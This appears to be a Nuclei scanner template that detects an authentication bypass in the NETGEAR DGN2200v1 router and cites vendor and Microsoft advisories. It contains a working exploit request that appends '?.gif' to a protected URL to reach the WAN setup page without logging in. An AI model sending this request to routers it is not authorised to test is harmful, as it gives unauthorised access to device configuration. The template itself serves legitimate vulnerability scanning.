id: netgear-router-auth-bypass info: name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif"). reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 tags: netgear,auth-bypass,router requests: - raw: - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "WAN Setup"